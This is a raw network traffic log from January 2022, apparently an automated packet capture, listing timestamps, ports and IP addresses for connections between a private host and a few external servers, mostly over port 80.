Jan 14, 2022 00:16:09.839363098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839463949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839607954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839624882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839725971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839854956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.839940071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.840019941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.840198040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.840209961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.840315104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.841147900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.841329098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.841450930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.841465950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.841649055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.841655016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.841783047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.841865063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842039108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842056036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842251062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842263937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842349052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842482090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842585087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842688084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842786074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.842858076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.843054056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.843065023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.843302011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.843317986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.843694925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.843888998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.844176054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.844192982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.844310999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.844500065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.844517946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.844645977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.844741106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.844825983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.844933987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.845021009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.845129013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.845254898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.845427036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.845443010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.845593929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.845638990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.845799923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.845849991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.846000910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.846147060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.846160889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.846267939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.846431971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.846442938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.846566916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.846642017 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.846657038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.846683025 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.846724033 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.846757889 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.846761942 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.846801996 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.846827030 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.846843004 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.846879959 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.846919060 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.846935034 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.846960068 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.846977949 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.846997976 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847037077 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847075939 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847094059 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.847122908 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847140074 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.847172022 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847212076 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847248077 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847270966 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.847287893 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847327948 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847327948 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.847342014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.847367048 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.847385883 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.847640991 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.847645998 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.847659111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.849878073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.854727983 CET	38133	49908	86.107.197.138	192.168.2.4
Jan 14, 2022 00:16:09.890532970 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.890788078 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.899339914 CET	49910	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.899981022 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.900557041 CET	49912	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.900598049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.900706053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.900840044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.900974989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.900994062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901165962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901179075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901278973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901465893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901483059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901592016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901681900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901791096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901905060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.901921034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902023077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902259111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902282953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902384996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902463913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902652979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902677059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902853012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902878046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.902929068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903110981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903160095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903240919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903438091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903467894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903594017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903722048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903740883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903867960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.903980970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904000044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904113054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904234886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904354095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904463053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904478073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904563904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904746056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904762030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.904889107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905006886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905025005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905157089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905210018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905302048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905432940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905450106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905546904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905637980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905783892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905905008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.905922890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906028986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906117916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906220913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906408072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906428099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906543016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906719923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906737089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906902075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.906918049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907078981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907097101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907263041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907278061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907454014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907470942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907582045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907680035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907696962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907795906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907958031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.907977104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.908128977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.908143044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.908299923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.908318043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.908781052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.909648895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.909912109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.909926891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.910026073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.910124063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.910209894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.910352945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.911132097 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.923671961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924021959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924180031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924318075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924331903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924499989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924628973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924685955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924875975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924890995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.924964905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925077915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925175905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925354958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925369024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925470114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925551891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925734043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925750017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925848007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.925932884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.926048994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.926131964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.926238060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.926367044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.926702023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.926717997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.926882029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.926899910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927062988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927076101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927165031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927309036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927325010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927433968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927535057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927615881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927798033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927813053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927901983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.927983999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928121090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928174019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928348064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928363085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928544044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928560972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928683996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928771973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928827047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.928910017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929080009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929099083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929176092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929328918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929457903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929475069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929610014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929692030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929721117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929816961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.929933071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930043936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930094957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930205107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930274010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930458069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930480957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930639982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930663109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930790901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930819035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.930963039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.931119919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.931137085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.931308031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.931348085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.931658983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.931842089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.931859016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.931940079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932123899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932142019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932246923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932411909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932426929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932507992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932683945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932699919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932789087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.932926893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.933115959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.933131933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.933228016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.933341026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.933476925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.942244053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.942526102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.942634106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.942651033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.942749023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.942934036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.942950964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.943036079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.959521055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.959709883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.959953070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960021019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960144997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960278988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960304976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960406065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960544109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960625887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960767984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960865021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.960961103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961042881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961153984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961241961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961344957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961443901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961520910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961688995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961770058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961855888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.961947918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.962021112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.962126970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.962236881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.962322950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.963351965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.963563919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.963649035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.963759899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.963934898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.963953972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.964047909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.964128971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.964266062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.964344025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.964364052 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.964720011 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.964860916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.964921951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.965018988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.965120077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.965219021 CET	49902	80	192.168.2.4	185.215.113.35
